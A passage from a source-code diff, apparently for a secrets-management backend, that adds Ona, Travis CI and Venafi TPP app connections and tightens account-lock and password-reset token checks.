pageSize: number; token?: string } } = { + pagination: { pageSize: ONA_PAGE_SIZE, ...(token ? { token } : {}) } + }; + + const { data } = await request.post(`${ONA_API_URL}${ONA_LIST_PROJECTS_PATH}`, body, { + headers: { + Authorization: `Bearer ${personalAccessToken}`, + "Content-Type": "application/json" + } + }); + + if (data?.projects?.length) { + allProjects.push( + ...data.projects.map((project) => ({ + id: project.id, + name: project.metadata?.name || "" + })) + ); + } + + token = data?.pagination?.nextToken || undefined; + hasMoreProjects = Boolean(token); + } + } catch (error) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to fetch Ona projects: ${ + error.response?.data ? JSON.stringify(error.response?.data) : error.message || "Unknown error" + }` + }); + } + throw error; + } + + logger.info({ allProjects }, "Ona projects fetched successfully"); + + return allProjects; +}; diff --git a/backend/src/services/app-connection/ona/ona-connection-schemas.ts b/backend/src/services/app-connection/ona/ona-connection-schemas.ts new file mode 100644 index 00000000000..5f6d76c8ac0 --- /dev/null +++ b/backend/src/services/app-connection/ona/ona-connection-schemas.ts @@ -0,0 +1,67 @@ +import z from "zod"; + +import { AppConnections } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + BaseAppConnectionSchema, + GenericCreateAppConnectionFieldsSchema, + GenericUpdateAppConnectionFieldsSchema +} from "@app/services/app-connection/app-connection-schemas"; + +import { APP_CONNECTION_NAME_MAP } from "../app-connection-maps"; +import { OnaConnectionMethod } from "./ona-connection-enums"; + +export const OnaConnectionPersonalAccessTokenCredentialsSchema = z.object({ + personalAccessToken: z + .string() + .trim() + .min(1, "Personal Access Token required") + .describe(AppConnections.CREDENTIALS.ONA.personalAccessToken) +}); + +const BaseOnaConnectionSchema = BaseAppConnectionSchema.extend({ + app: z.literal(AppConnection.Ona) +}); + +export const OnaConnectionSchema = BaseOnaConnectionSchema.extend({ + method: z.literal(OnaConnectionMethod.PersonalAccessToken), + credentials: OnaConnectionPersonalAccessTokenCredentialsSchema +}); + +export const SanitizedOnaConnectionSchema = z.discriminatedUnion("method", [ + BaseOnaConnectionSchema.extend({ + method: z.literal(OnaConnectionMethod.PersonalAccessToken), + credentials: OnaConnectionPersonalAccessTokenCredentialsSchema.pick({}) + }).describe(JSON.stringify({ title: `${APP_CONNECTION_NAME_MAP[AppConnection.Ona]} (Personal Access Token)` })) +]); + +export const ValidateOnaConnectionCredentialsSchema = z.discriminatedUnion("method", [ + z.object({ + method: z + .literal(OnaConnectionMethod.PersonalAccessToken) + .describe(AppConnections.CREATE(AppConnection.Ona).method), + credentials: OnaConnectionPersonalAccessTokenCredentialsSchema.describe( + AppConnections.CREATE(AppConnection.Ona).credentials + ) + }) +]); + +export const CreateOnaConnectionSchema = ValidateOnaConnectionCredentialsSchema.and( + GenericCreateAppConnectionFieldsSchema(AppConnection.Ona) +); + +export const UpdateOnaConnectionSchema = z + .object({ + credentials: OnaConnectionPersonalAccessTokenCredentialsSchema.optional().describe( + AppConnections.UPDATE(AppConnection.Ona).credentials + ) + }) + .and(GenericUpdateAppConnectionFieldsSchema(AppConnection.Ona)); + +export const OnaConnectionListItemSchema = z + .object({ + name: z.literal("Ona"), + app: z.literal(AppConnection.Ona), + methods: z.nativeEnum(OnaConnectionMethod).array() + }) + .describe(JSON.stringify({ title: APP_CONNECTION_NAME_MAP[AppConnection.Ona] })); diff --git a/backend/src/services/app-connection/ona/ona-connection-service.ts b/backend/src/services/app-connection/ona/ona-connection-service.ts new file mode 100644 index 00000000000..bc2927dc228 --- /dev/null +++ b/backend/src/services/app-connection/ona/ona-connection-service.ts @@ -0,0 +1,28 @@ +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { listOnaProjects } from "./ona-connection-fns"; +import { TOnaConnection } from "./ona-connection-types"; + +type TGetAppConnectionFunc = ( + app: AppConnection, + connectionId: string, + actor: OrgServiceActor +) => Promise; + +export const onaConnectionService = (getAppConnection: TGetAppConnectionFunc) => { + const listProjects = async (connectionId: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.Ona, connectionId, actor); + try { + return await listOnaProjects(appConnection); + } catch (error) { + logger.error(error, "Failed to establish connection with Ona"); + return []; + } + }; + + return { + listProjects + }; +}; diff --git a/backend/src/services/app-connection/ona/ona-connection-types.ts b/backend/src/services/app-connection/ona/ona-connection-types.ts new file mode 100644 index 00000000000..cd13cb10320 --- /dev/null +++ b/backend/src/services/app-connection/ona/ona-connection-types.ts @@ -0,0 +1,41 @@ +import z from "zod"; + +import { DiscriminativePick } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { + CreateOnaConnectionSchema, + OnaConnectionSchema, + ValidateOnaConnectionCredentialsSchema +} from "./ona-connection-schemas"; + +export type TOnaConnection = z.infer; + +export type TOnaConnectionInput = z.infer & { + app: AppConnection.Ona; +}; + +export type TValidateOnaConnectionCredentialsSchema = typeof ValidateOnaConnectionCredentialsSchema; + +export type TOnaConnectionConfig = DiscriminativePick & { + orgId: string; +}; + +export type TOnaProject = { + id: string; + name: string; +}; + +export type TOnaRawProject = { + id: string; + metadata?: { + name?: string; + }; +}; + +export type TOnaProjectListResponse = { + projects: TOnaRawProject[]; + pagination?: { + nextToken?: string; + }; +}; diff --git a/backend/src/services/app-connection/travis-ci/index.ts b/backend/src/services/app-connection/travis-ci/index.ts new file mode 100644 index 00000000000..0649d781031 --- /dev/null +++ b/backend/src/services/app-connection/travis-ci/index.ts @@ -0,0 +1,4 @@ +export * from "./travis-ci-connection-enums"; +export * from "./travis-ci-connection-fns"; +export * from "./travis-ci-connection-schemas"; +export * from "./travis-ci-connection-types"; diff --git a/backend/src/services/app-connection/travis-ci/travis-ci-connection-enums.ts b/backend/src/services/app-connection/travis-ci/travis-ci-connection-enums.ts new file mode 100644 index 00000000000..9e1a9644331 --- /dev/null +++ b/backend/src/services/app-connection/travis-ci/travis-ci-connection-enums.ts @@ -0,0 +1,3 @@ +export enum TravisCIConnectionMethod { + ApiToken = "api-token" +} diff --git a/backend/src/services/app-connection/travis-ci/travis-ci-connection-fns.ts b/backend/src/services/app-connection/travis-ci/travis-ci-connection-fns.ts new file mode 100644 index 00000000000..ea602b68367 --- /dev/null +++ b/backend/src/services/app-connection/travis-ci/travis-ci-connection-fns.ts @@ -0,0 +1,153 @@ +import { AxiosError } from "axios"; + +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { IntegrationUrls } from "@app/services/integration-auth/integration-list"; + +import { TravisCIConnectionMethod } from "./travis-ci-connection-enums"; +import { + TravisCIBranch, + TravisCIRepository, + TTravisCIConnection, + TTravisCIConnectionConfig +} from "./travis-ci-connection-types"; + +const travisCIApiHeaders = (apiToken: string) => ({ + Authorization: `token ${apiToken}`, + "Travis-API-Version": "3", + Accept: "application/json" +}); + +type TravisCIPaginationMeta = { + is_last?: boolean; + next?: { "@href": string } | null; +}; + +const resolveNextTravisCIUrl = (pagination: TravisCIPaginationMeta | undefined): string | undefined => { + const nextHref = pagination?.next?.["@href"]; + if (pagination?.is_last || !nextHref) return undefined; + return nextHref.startsWith("http") ? nextHref : `${IntegrationUrls.TRAVISCI_API_URL}${nextHref}`; +}; + +export const getTravisCIConnectionListItem = () => { + return { + name: "Travis CI" as const, + app: AppConnection.TravisCI as const, + methods: Object.values(TravisCIConnectionMethod) as [TravisCIConnectionMethod.ApiToken] + }; +}; + +export const validateTravisCIConnectionCredentials = async (config: TTravisCIConnectionConfig) => { + const { credentials: inputCredentials } = config; + + try { + await request.get(`${IntegrationUrls.TRAVISCI_API_URL}/user`, { + headers: travisCIApiHeaders(inputCredentials.apiToken) + }); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to validate credentials: ${ + error.response?.data ? JSON.stringify(error.response?.data) : error.message || "Unknown error" + }` + }); + } + throw new BadRequestError({ + message: `Unable to validate connection: ${(error as Error).message || "Verify credentials"}` + }); + } + + return inputCredentials; +}; + +export const listTravisCIRepositories = async (appConnection: TTravisCIConnection): Promise => { + const { + credentials: { apiToken } + } = appConnection; + + try { + type TravisCIRepositoriesResponse = { + "@pagination"?: TravisCIPaginationMeta; + repositories?: { id: string | number; slug: string }[]; + }; + + const allRepos: { id: string | number; slug: string }[] = []; + let nextUrl: string | undefined = `${IntegrationUrls.TRAVISCI_API_URL}/repos`; + + while (nextUrl) { + // eslint-disable-next-line no-await-in-loop + const { data }: { data: TravisCIRepositoriesResponse } = await request.get(nextUrl, { + headers: travisCIApiHeaders(apiToken) + }); + + if (Array.isArray(data.repositories)) { + allRepos.push(...data.repositories); + } + + nextUrl = resolveNextTravisCIUrl(data["@pagination"]); + } + + return allRepos.map((repo) => ({ + id: String(repo.id), + slug: repo.slug, + name: repo.slug?.split("/")[1] ?? repo.slug + })); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to fetch Travis CI repositories: ${ + error.response?.data ? JSON.stringify(error.response?.data) : error.message || "Unknown error" + }` + }); + } + throw error; + } +}; + +export const listTravisCIBranches = async ( + appConnection: TTravisCIConnection, + repositoryId: string +): Promise => { + const { + credentials: { apiToken } + } = appConnection; + + try { + type TravisCIBranchesResponse = { + "@pagination"?: TravisCIPaginationMeta; + branches?: { name: string; default_branch?: boolean }[]; + }; + + const allBranches: { name: string; default_branch?: boolean }[] = []; + let nextUrl: string | undefined = + `${IntegrationUrls.TRAVISCI_API_URL}/repo/${encodeURIComponent(repositoryId)}/branches`; + + while (nextUrl) { + // eslint-disable-next-line no-await-in-loop + const { data }: { data: TravisCIBranchesResponse } = await request.get(nextUrl, { + headers: travisCIApiHeaders(apiToken) + }); + + if (Array.isArray(data.branches)) { + allBranches.push(...data.branches); + } + + nextUrl = resolveNextTravisCIUrl(data["@pagination"]); + } + + return allBranches.map((branch) => ({ + name: branch.name, + isDefault: Boolean(branch.default_branch) + })); + } catch (error: unknown) { + if (error instanceof AxiosError) { + throw new BadRequestError({ + message: `Failed to fetch Travis CI branches: ${ + error.response?.data ? JSON.stringify(error.response?.data) : error.message || "Unknown error" + }` + }); + } + throw error; + } +}; diff --git a/backend/src/services/app-connection/travis-ci/travis-ci-connection-schemas.ts b/backend/src/services/app-connection/travis-ci/travis-ci-connection-schemas.ts new file mode 100644 index 00000000000..989d7dd4db5 --- /dev/null +++ b/backend/src/services/app-connection/travis-ci/travis-ci-connection-schemas.ts @@ -0,0 +1,61 @@ +import z from "zod"; + +import { AppConnections } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + BaseAppConnectionSchema, + GenericCreateAppConnectionFieldsSchema, + GenericUpdateAppConnectionFieldsSchema +} from "@app/services/app-connection/app-connection-schemas"; + +import { APP_CONNECTION_NAME_MAP } from "../app-connection-maps"; +import { TravisCIConnectionMethod } from "./travis-ci-connection-enums"; + +export const TravisCIConnectionAccessTokenCredentialsSchema = z.object({ + apiToken: z.string().trim().min(1, "API Token required").describe(AppConnections.CREDENTIALS.TRAVISCI.apiToken) +}); + +const BaseTravisCIConnectionSchema = BaseAppConnectionSchema.extend({ + app: z.literal(AppConnection.TravisCI) +}); + +export const TravisCIConnectionSchema = BaseTravisCIConnectionSchema.extend({ + method: z.literal(TravisCIConnectionMethod.ApiToken), + credentials: TravisCIConnectionAccessTokenCredentialsSchema +}); + +export const SanitizedTravisCIConnectionSchema = z.discriminatedUnion("method", [ + BaseTravisCIConnectionSchema.extend({ + method: z.literal(TravisCIConnectionMethod.ApiToken), + credentials: TravisCIConnectionAccessTokenCredentialsSchema.pick({}) + }).describe(JSON.stringify({ title: `${APP_CONNECTION_NAME_MAP[AppConnection.TravisCI]} (API Token)` })) +]); + +export const ValidateTravisCIConnectionCredentialsSchema = z.discriminatedUnion("method", [ + z.object({ + method: z.literal(TravisCIConnectionMethod.ApiToken).describe(AppConnections.CREATE(AppConnection.TravisCI).method), + credentials: TravisCIConnectionAccessTokenCredentialsSchema.describe( + AppConnections.CREATE(AppConnection.TravisCI).credentials + ) + }) +]); + +export const CreateTravisCIConnectionSchema = ValidateTravisCIConnectionCredentialsSchema.and( + GenericCreateAppConnectionFieldsSchema(AppConnection.TravisCI) +); + +export const UpdateTravisCIConnectionSchema = z + .object({ + credentials: TravisCIConnectionAccessTokenCredentialsSchema.optional().describe( + AppConnections.UPDATE(AppConnection.TravisCI).credentials + ) + }) + .and(GenericUpdateAppConnectionFieldsSchema(AppConnection.TravisCI)); + +export const TravisCIConnectionListItemSchema = z + .object({ + name: z.literal("Travis CI"), + app: z.literal(AppConnection.TravisCI), + methods: z.nativeEnum(TravisCIConnectionMethod).array() + }) + .describe(JSON.stringify({ title: APP_CONNECTION_NAME_MAP[AppConnection.TravisCI] })); diff --git a/backend/src/services/app-connection/travis-ci/travis-ci-connection-service.ts b/backend/src/services/app-connection/travis-ci/travis-ci-connection-service.ts new file mode 100644 index 00000000000..10c350f7339 --- /dev/null +++ b/backend/src/services/app-connection/travis-ci/travis-ci-connection-service.ts @@ -0,0 +1,39 @@ +import { logger } from "@app/lib/logger"; +import { OrgServiceActor } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { listTravisCIBranches, listTravisCIRepositories } from "./travis-ci-connection-fns"; +import { TTravisCIConnection } from "./travis-ci-connection-types"; + +type TGetAppConnectionFunc = ( + app: AppConnection, + connectionId: string, + actor: OrgServiceActor +) => Promise; + +export const travisCIConnectionService = (getAppConnection: TGetAppConnectionFunc) => { + const listRepositories = async (connectionId: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.TravisCI, connectionId, actor); + try { + return await listTravisCIRepositories(appConnection); + } catch (error) { + logger.error(error, "Failed to list Travis CI repositories"); + return []; + } + }; + + const listBranches = async (connectionId: string, repositoryId: string, actor: OrgServiceActor) => { + const appConnection = await getAppConnection(AppConnection.TravisCI, connectionId, actor); + try { + return await listTravisCIBranches(appConnection, repositoryId); + } catch (error) { + logger.error(error, "Failed to list Travis CI branches"); + return []; + } + }; + + return { + listRepositories, + listBranches + }; +}; diff --git a/backend/src/services/app-connection/travis-ci/travis-ci-connection-types.ts b/backend/src/services/app-connection/travis-ci/travis-ci-connection-types.ts new file mode 100644 index 00000000000..d1067591cad --- /dev/null +++ b/backend/src/services/app-connection/travis-ci/travis-ci-connection-types.ts @@ -0,0 +1,36 @@ +import z from "zod"; + +import { DiscriminativePick } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { + CreateTravisCIConnectionSchema, + TravisCIConnectionSchema, + ValidateTravisCIConnectionCredentialsSchema +} from "./travis-ci-connection-schemas"; + +export type TTravisCIConnection = z.infer; + +export type TTravisCIConnectionInput = z.infer & { + app: AppConnection.TravisCI; +}; + +export type TValidateTravisCIConnectionCredentialsSchema = typeof ValidateTravisCIConnectionCredentialsSchema; + +export type TTravisCIConnectionConfig = DiscriminativePick< + TTravisCIConnectionInput, + "method" | "app" | "credentials" +> & { + orgId: string; +}; + +export type TravisCIRepository = { + id: string; + name: string; + slug: string; +}; + +export type TravisCIBranch = { + name: string; + isDefault: boolean; +}; diff --git a/backend/src/services/app-connection/venafi-tpp/index.ts b/backend/src/services/app-connection/venafi-tpp/index.ts new file mode 100644 index 00000000000..596acec3f76 --- /dev/null +++ b/backend/src/services/app-connection/venafi-tpp/index.ts @@ -0,0 +1,4 @@ +export * from "./venafi-tpp-connection-enums"; +export * from "./venafi-tpp-connection-fns"; +export * from "./venafi-tpp-connection-schemas"; +export * from "./venafi-tpp-connection-types"; diff --git a/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-enums.ts b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-enums.ts new file mode 100644 index 00000000000..5cdd3a1f04f --- /dev/null +++ b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-enums.ts @@ -0,0 +1,3 @@ +export enum VenafiTppConnectionMethod { + OAuth = "oauth" +} diff --git a/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-fns.ts b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-fns.ts new file mode 100644 index 00000000000..2ffdfef1b7d --- /dev/null +++ b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-fns.ts @@ -0,0 +1,233 @@ +import { AxiosError, AxiosRequestConfig, AxiosResponse } from "axios"; +import https from "https"; +import RE2 from "re2"; + +import { verifyHostInputValidity } from "@app/ee/services/dynamic-secret/dynamic-secret-fns"; +import { TGatewayV2ServiceFactory } from "@app/ee/services/gateway-v2/gateway-v2-service"; +import { request } from "@app/lib/config/request"; +import { BadRequestError } from "@app/lib/errors"; +import { GatewayProxyProtocol } from "@app/lib/gateway"; +import { withGatewayV2Proxy } from "@app/lib/gateway-v2/gateway-v2"; +import { logger } from "@app/lib/logger"; +import { blockLocalAndPrivateIpAddresses } from "@app/lib/validator/validate-url"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; + +import { VenafiTppConnectionMethod } from "./venafi-tpp-connection-enums"; +import { TVenafiTppConnectionConfig } from "./venafi-tpp-connection-types"; + +type TVenafiTppCredentials = { + tppUrl: string; + clientId: string; + username: string; + password: string; +}; + +type TVenafiTppOAuthResponse = { + access_token: string; + refresh_token: string; + expires_in: number; + expires: number; + token_type: string; + scope: string; + identity: string; +}; + +/** + * Normalizes the TPP base URL by removing trailing slashes + */ +const normalizeTppUrl = (tppUrl: string): string => { + return tppUrl.replace(new RE2("\\/+$"), ""); +}; + +/** + * Issues an HTTP request to the Venafi TPP server, routing through the configured + * gateway transport when the connection has a gatewayId set. + */ +export const requestWithVenafiTppGateway = async ( + appConnection: { gatewayId?: string | null }, + gatewayV2Service: Pick, + requestConfig: AxiosRequestConfig +): Promise> => { + const { gatewayId } = appConnection; + + const url = new URL(requestConfig.url as string); + await blockLocalAndPrivateIpAddresses(url.toString(), Boolean(gatewayId)); + + if (!gatewayId) { + return request.request(requestConfig); + } + + const [targetHost] = await verifyHostInputValidity({ host: url.hostname, isGateway: true, isDynamicSecret: false }); + // eslint-disable-next-line no-nested-ternary + const targetPort = url.port ? Number(url.port) : url.protocol === "https:" ? 443 : 80; + + const gatewayConnectionDetails = await gatewayV2Service.getPlatformConnectionDetailsByGatewayId({ + gatewayId, + targetHost, + targetPort + }); + + if (!gatewayConnectionDetails) { + throw new BadRequestError({ + message: "Venafi TPP connections only support v2 gateways. Please attach a v2 gateway to this connection." + }); + } + + return withGatewayV2Proxy( + async (proxyPort) => { + const isHttps = url.protocol === "https:"; + url.host = `localhost:${proxyPort}`; + + const finalRequestConfig: AxiosRequestConfig = { + ...requestConfig, + url: url.toString(), + headers: { + ...requestConfig.headers, + Host: targetHost + }, + ...(isHttps && { + httpsAgent: new https.Agent({ + servername: targetHost + }) + }) + }; + + try { + return await request.request(finalRequestConfig); + } catch (error) { + if (error instanceof AxiosError) { + logger.error( + { message: error.message, data: (error.response as undefined | { data: unknown })?.data }, + "Error during Venafi TPP gateway request:" + ); + } + throw error; + } + }, + { + protocol: GatewayProxyProtocol.Tcp, + relayHost: gatewayConnectionDetails.relayHost, + gateway: gatewayConnectionDetails.gateway, + relay: gatewayConnectionDetails.relay + } + ); +}; + +/** + * Authenticates with Venafi TPP via OAuth and returns an access token. + */ +export const authenticateVenafiTpp = async ( + { credentials, ...appConnection }: { gatewayId?: string | null; credentials: TVenafiTppCredentials }, + gatewayV2Service: Pick +): Promise => { + const { tppUrl, clientId, username, password } = credentials; + const baseUrl = normalizeTppUrl(tppUrl); + + logger.info("Venafi TPP: Authenticating via OAuth token endpoint"); + + const { data } = await requestWithVenafiTppGateway(appConnection, gatewayV2Service, { + method: "POST", + url: `${baseUrl}/vedauth/authorize/oauth`, + data: { + client_id: clientId, + username, + password, + scope: "certificate:manage,discover,revoke;configuration" + } + }); + + logger.info("Venafi TPP: Successfully obtained access token"); + + return data; +}; + +/** + * Revokes a Venafi TPP access token. + */ +export const revokeVenafiTppToken = async ( + { credentials, ...appConnection }: { gatewayId?: string | null; credentials: { tppUrl: string } }, + accessToken: string, + gatewayV2Service: Pick +): Promise => { + const baseUrl = normalizeTppUrl(credentials.tppUrl); + + try { + await requestWithVenafiTppGateway(appConnection, gatewayV2Service, { + method: "GET", + url: `${baseUrl}/vedauth/revoke/token`, + headers: { + Authorization: `Bearer ${accessToken}` + } + }); + logger.info("Venafi TPP: Successfully revoked access token"); + } catch (error) { + logger.warn(error, "Venafi TPP: Failed to revoke access token"); + } +}; + +export const getVenafiTppHeaders = (accessToken: string) => ({ + Authorization: `Bearer ${accessToken}`, + "Content-Type": "application/json" +}); + +export const getVenafiTppConnectionListItem = () => { + return { + name: "Venafi TPP" as const, + app: AppConnection.VenafiTpp as const, + methods: Object.values(VenafiTppConnectionMethod) as [VenafiTppConnectionMethod.OAuth] + }; +}; + +export const validateVenafiTppConnectionCredentials = async ( + config: TVenafiTppConnectionConfig, + gatewayV2Service: Pick +) => { + const credentials = config.credentials as TVenafiTppCredentials; + const { tppUrl } = credentials; + + logger.info({ tppUrl }, "Venafi TPP: Validating connection credentials"); + + let accessToken: string | undefined; + try { + const authResponse = await authenticateVenafiTpp({ gatewayId: config.gatewayId, credentials }, gatewayV2Service); + accessToken = authResponse.access_token; + + logger.info( + { + tppUrl, + identity: authResponse.identity, + scope: authResponse.scope + }, + "Venafi TPP: Credential validation successful" + ); + } catch (error: unknown) { + if (error instanceof BadRequestError) { + throw error; + } + if (error instanceof AxiosError) { + const statusCode = error.response?.status; + const errorMessage = + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access + (error.response?.data?.error_description as string) || + // eslint-disable-next-line @typescript-eslint/no-unsafe-member-access + (error.response?.data?.error as string) || + error.message; + + logger.error({ tppUrl, statusCode, errorMessage }, "Venafi TPP: Failed to validate credentials"); + + throw new BadRequestError({ + message: `Failed to validate Venafi TPP credentials: ${errorMessage}` + }); + } + logger.error(error, "Venafi TPP: Unexpected error during credential validation"); + throw new BadRequestError({ + message: `Failed to validate Venafi TPP credentials: ${(error as Error)?.message || "Unknown error"}` + }); + } finally { + if (accessToken) { + await revokeVenafiTppToken({ gatewayId: config.gatewayId, credentials }, accessToken, gatewayV2Service); + } + } + + return config.credentials; +}; diff --git a/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-schemas.ts b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-schemas.ts new file mode 100644 index 00000000000..aff8c0d796f --- /dev/null +++ b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-schemas.ts @@ -0,0 +1,85 @@ +import z from "zod"; + +import { AppConnections } from "@app/lib/api-docs"; +import { AppConnection } from "@app/services/app-connection/app-connection-enums"; +import { + BaseAppConnectionSchema, + GenericCreateAppConnectionFieldsSchema, + GenericUpdateAppConnectionFieldsSchema +} from "@app/services/app-connection/app-connection-schemas"; + +import { APP_CONNECTION_NAME_MAP } from "../app-connection-maps"; +import { VenafiTppConnectionMethod } from "./venafi-tpp-connection-enums"; + +export const VenafiTppOAuthCredentialsSchema = z.object({ + tppUrl: z + .string() + .trim() + .min(1, "TPP URL required") + .max(512) + .refine((value) => value.startsWith("https://"), "TPP URL must use HTTPS") + .describe(AppConnections.CREDENTIALS.VENAFI_TPP.tppUrl), + clientId: z + .string() + .trim() + .min(1, "Client ID required") + .max(255) + .describe(AppConnections.CREDENTIALS.VENAFI_TPP.clientId), + username: z + .string() + .trim() + .min(1, "Username required") + .max(255) + .describe(AppConnections.CREDENTIALS.VENAFI_TPP.username), + password: z + .string() + .trim() + .min(1, "Password required") + .max(255) + .describe(AppConnections.CREDENTIALS.VENAFI_TPP.password) +}); + +const BaseVenafiTppConnectionSchema = BaseAppConnectionSchema.extend({ app: z.literal(AppConnection.VenafiTpp) }); + +export const VenafiTppConnectionSchema = BaseVenafiTppConnectionSchema.extend({ + method: z.literal(VenafiTppConnectionMethod.OAuth), + credentials: VenafiTppOAuthCredentialsSchema +}); + +export const SanitizedVenafiTppConnectionSchema = z.discriminatedUnion("method", [ + BaseVenafiTppConnectionSchema.extend({ + method: z.literal(VenafiTppConnectionMethod.OAuth), + credentials: VenafiTppOAuthCredentialsSchema.pick({ + tppUrl: true, + clientId: true, + username: true + }) + }).describe(JSON.stringify({ title: `${APP_CONNECTION_NAME_MAP[AppConnection.VenafiTpp]} (OAuth)` })) +]); + +export const ValidateVenafiTppConnectionCredentialsSchema = z.discriminatedUnion("method", [ + z.object({ + method: z.literal(VenafiTppConnectionMethod.OAuth).describe(AppConnections.CREATE(AppConnection.VenafiTpp).method), + credentials: VenafiTppOAuthCredentialsSchema.describe(AppConnections.CREATE(AppConnection.VenafiTpp).credentials) + }) +]); + +export const CreateVenafiTppConnectionSchema = ValidateVenafiTppConnectionCredentialsSchema.and( + GenericCreateAppConnectionFieldsSchema(AppConnection.VenafiTpp, { supportsGateways: true }) +); + +export const UpdateVenafiTppConnectionSchema = z + .object({ + credentials: VenafiTppOAuthCredentialsSchema.optional().describe( + AppConnections.UPDATE(AppConnection.VenafiTpp).credentials + ) + }) + .and(GenericUpdateAppConnectionFieldsSchema(AppConnection.VenafiTpp, { supportsGateways: true })); + +export const VenafiTppConnectionListItemSchema = z + .object({ + name: z.literal("Venafi TPP"), + app: z.literal(AppConnection.VenafiTpp), + methods: z.nativeEnum(VenafiTppConnectionMethod).array() + }) + .describe(JSON.stringify({ title: APP_CONNECTION_NAME_MAP[AppConnection.VenafiTpp] })); diff --git a/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-types.ts b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-types.ts new file mode 100644 index 00000000000..5a4e665a40e --- /dev/null +++ b/backend/src/services/app-connection/venafi-tpp/venafi-tpp-connection-types.ts @@ -0,0 +1,25 @@ +import z from "zod"; + +import { DiscriminativePick } from "@app/lib/types"; + +import { AppConnection } from "../app-connection-enums"; +import { + CreateVenafiTppConnectionSchema, + ValidateVenafiTppConnectionCredentialsSchema, + VenafiTppConnectionSchema +} from "./venafi-tpp-connection-schemas"; + +export type TVenafiTppConnection = z.infer; + +export type TVenafiTppConnectionInput = z.infer & { + app: AppConnection.VenafiTpp; +}; + +export type TValidateVenafiTppConnectionCredentialsSchema = typeof ValidateVenafiTppConnectionCredentialsSchema; + +export type TVenafiTppConnectionConfig = DiscriminativePick< + TVenafiTppConnectionInput, + "method" | "app" | "credentials" | "gatewayId" +> & { + orgId: string; +}; diff --git a/backend/src/services/auth-token/auth-token-service.ts b/backend/src/services/auth-token/auth-token-service.ts index c15444f76d0..b1892d89bab 100644 --- a/backend/src/services/auth-token/auth-token-service.ts +++ b/backend/src/services/auth-token/auth-token-service.ts @@ -290,6 +290,10 @@ export const tokenServiceFactory = ({ tokenDAL, userDAL, orgDAL, keyStore }: TAu ); if (!user || !user.isAccepted) throw new NotFoundError({ message: `User with ID '${session.userId}' not found` }); + if (user.isLocked || (user.temporaryLockDateEnd && new Date() < user.temporaryLockDateEnd)) { + throw new UnauthorizedError({ message: "Account is locked" }); + } + let orgId = ""; let orgName = ""; let rootOrgId = ""; diff --git a/backend/src/services/auth/auth-fns.ts b/backend/src/services/auth/auth-fns.ts index 54bbc8a414f..e99406f1f62 100644 --- a/backend/src/services/auth/auth-fns.ts +++ b/backend/src/services/auth/auth-fns.ts @@ -3,7 +3,7 @@ import { request } from "@app/lib/config/request"; import { crypto } from "@app/lib/crypto"; import { BadRequestError, ForbiddenRequestError, UnauthorizedError } from "@app/lib/errors"; -import { AuthModeSignUpTokenPayload, AuthTokenType } from "./auth-type"; +import { AuthModeAccountRecoveryTokenPayload, AuthModeSignUpTokenPayload, AuthTokenType } from "./auth-type"; export const extractBearerToken = (token?: string): string => { if (!token) { @@ -43,9 +43,9 @@ export const validatePasswordResetAuthorization = (token?: string) => { const appCfg = getConfig(); const authTokenValue = extractBearerToken(token); - const decodedToken = crypto.jwt().verify(authTokenValue, appCfg.AUTH_SECRET) as AuthModeSignUpTokenPayload; + const decodedToken = crypto.jwt().verify(authTokenValue, appCfg.AUTH_SECRET) as AuthModeAccountRecoveryTokenPayload; - if (decodedToken.authTokenType !== AuthTokenType.SIGNUP_TOKEN) { + if (decodedToken.authTokenType !== AuthTokenType.ACCOUNT_RECOVERY_TOKEN) { throw new UnauthorizedError({ message: `The provided authentication token type is not supported.` }); diff --git a/backend/src/services/auth/auth-login-service.ts b/backend/src/services/auth/auth-login-service.ts index b8c5cf8fcae..22c9bdbd2bd 100644 --- a/backend/src/services/auth/auth-login-service.ts +++ b/backend/src/services/auth/auth-login-service.ts @@ -12,7 +12,7 @@ import { EventType, TAuditLogServiceFactory } from "@app/ee/services/audit-log/a import { OrgPermissionSsoActions, OrgPermissionSubjects } from "@app/ee/services/permission/org-permission"; import { isAuthMethodSaml } from "@app/ee/services/permission/permission-fns"; import { TPermissionServiceFactory } from "@app/ee/services/permission/permission-service-types"; -import { KeyStorePrefixes, TKeyStoreFactory } from "@app/keystore/keystore"; +import { KeyStorePrefixes, KeyStoreTtls, TKeyStoreFactory } from "@app/keystore/keystore"; import { getConfig } from "@app/lib/config/env"; import { crypto, generateSrpServerKey, srpCheckClientProof } from "@app/lib/crypto"; import { getUserPrivateKey } from "@app/lib/crypto/srp"; @@ -25,6 +25,8 @@ import { } from "@app/lib/errors"; import { getMinExpiresIn, removeTrailingSlash } from "@app/lib/fn"; import { logger } from "@app/lib/logger"; +import { requestMemoKeys } from "@app/lib/request-context/memo-keys"; +import { requestMemoize } from "@app/lib/request-context/request-memoizer"; import { AuthAttemptAuthMethod, AuthAttemptAuthResult, authAttemptCounter } from "@app/lib/telemetry/metrics"; import { sanitizeEmail, validateEmail } from 